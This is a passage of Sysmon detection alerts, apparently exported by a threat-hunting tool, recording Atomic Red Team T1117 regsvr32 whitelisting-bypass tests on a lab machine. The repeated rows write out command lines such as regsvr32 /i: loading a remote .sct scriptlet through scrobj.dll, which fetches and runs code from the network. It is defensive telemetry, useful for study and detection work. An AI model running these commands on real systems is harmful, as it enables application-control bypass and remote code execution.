747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548026.975169,2019-07-19T18:53:46.975169+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4045 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:46.867 + 747F3D96-D97A-5D31-0000-001019DE3800 + 5828 + C:\Windows\System32\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1563548026.893188,2019-07-19T18:53:46.893188+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\regsvr32.exe) with commandline ( "C:\Windows\syswow64\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4044 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:46.831 + 747F3D96-D97A-5D31-0000-00109DDC3800 + 3564 + C:\Windows\SysWOW64\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\syswow64\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,1563548026.893188,2019-07-19T18:53:46.893188+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\regsvr32.exe ) through command line ( "C:\Windows\syswow64\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4044 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:46.831 + 747F3D96-D97A-5D31-0000-00109DDC3800 + 3564 + C:\Windows\SysWOW64\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\syswow64\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548026.893188,2019-07-19T18:53:46.893188+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\regsvr32.exe ) through command line ( "C:\Windows\syswow64\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4044 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:46.831 + 747F3D96-D97A-5D31-0000-00109DDC3800 + 3564 + C:\Windows\SysWOW64\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\syswow64\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1563548026.848703,2019-07-19T18:53:46.848703+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\regsvr32.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 4043 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Suspicious NetCon + 2019-07-19 14:53:40.896 + 747F3D96-D978-5D31-0000-0010EB313800 + 2076 + C:\Windows\System32\regsvr32.exe + MSEDGEWIN10\IEUser + tcp + true + false + 10.0.2.15 + MSEDGEWIN10.home + 49728 + + false + 151.101.0.133 + + 443 + https + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548026.589404,2019-07-19T18:53:46.589404+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4042 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:46.405 + 747F3D96-D97A-5D31-0000-001089BD3800 + 7148 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,1563548026.565529,2019-07-19T18:53:46.565529+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( "C:\Windows\System32\calc.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4041 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:46.135 + 747F3D96-D97A-5D31-0000-00105DA83800 + 4336 + C:\Windows\System32\calc.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Calculator + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\calc.exe" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729 + 747F3D96-D978-5D31-0000-0010EB313800 + 2076 + C:\Windows\System32\regsvr32.exe + regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1563548024.117123,2019-07-19T18:53:44.117123+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4038 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:44.049 + 747F3D96-D978-5D31-0000-0010EB313800 + 2076 + C:\Windows\System32\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F + 747F3D96-D978-5D31-0000-0010442F3800 + 2832 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,1563548024.117123,2019-07-19T18:53:44.117123+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4038 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:44.049 + 747F3D96-D978-5D31-0000-0010EB313800 + 2076 + C:\Windows\System32\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F + 747F3D96-D978-5D31-0000-0010442F3800 + 2832 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548024.117123,2019-07-19T18:53:44.117123+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4038 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:44.049 + 747F3D96-D978-5D31-0000-0010EB313800 + 2076 + C:\Windows\System32\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F + 747F3D96-D978-5D31-0000-0010442F3800 + 2832 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548024.054072,2019-07-19T18:53:44.054072+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4037 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:44.010 + 747F3D96-D978-5D31-0000-0010442F3800 + 2832 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548024.054072,2019-07-19T18:53:44.054072+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4037 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:44.010 + 747F3D96-D978-5D31-0000-0010442F3800 + 2832 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548024.026061,2019-07-19T18:53:44.026061+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4036 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:43.460 + 747F3D96-D977-5D31-0000-0010771B3800 + 1476 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,1563548023.574378,2019-07-19T18:53:43.574378+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( "C:\Windows\System32\calc.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4035 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:43.339 + 747F3D96-D977-5D31-0000-00100A0E3800 + 3848 + C:\Windows\System32\calc.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Calculator + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\calc.exe" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729 + 747F3D96-D976-5D31-0000-001093EA3700 + 2332 + C:\Windows\System32\regsvr32.exe + regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1563548022.964349,2019-07-19T18:53:42.964349+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4033 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:42.834 + 747F3D96-D976-5D31-0000-001093EA3700 + 2332 + C:\Windows\System32\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F + 747F3D96-D976-5D31-0000-001041E83700 + 4444 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,1563548022.964349,2019-07-19T18:53:42.964349+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4033 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:42.834 + 747F3D96-D976-5D31-0000-001093EA3700 + 2332 + C:\Windows\System32\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F + 747F3D96-D976-5D31-0000-001041E83700 + 4444 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548022.964349,2019-07-19T18:53:42.964349+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4033 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:42.834 + 747F3D96-D976-5D31-0000-001093EA3700 + 2332 + C:\Windows\System32\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F + 747F3D96-D976-5D31-0000-001041E83700 + 4444 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548022.841951,2019-07-19T18:53:42.841951+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4032 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:42.803 + 747F3D96-D976-5D31-0000-001041E83700 + 4444 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548022.841951,2019-07-19T18:53:42.841951+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4032 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:42.803 + 747F3D96-D976-5D31-0000-001041E83700 + 4444 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548022.815966,2019-07-19T18:53:42.815966+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4031 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:42.384 + 747F3D96-D976-5D31-0000-0010D8D53700 + 6312 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + 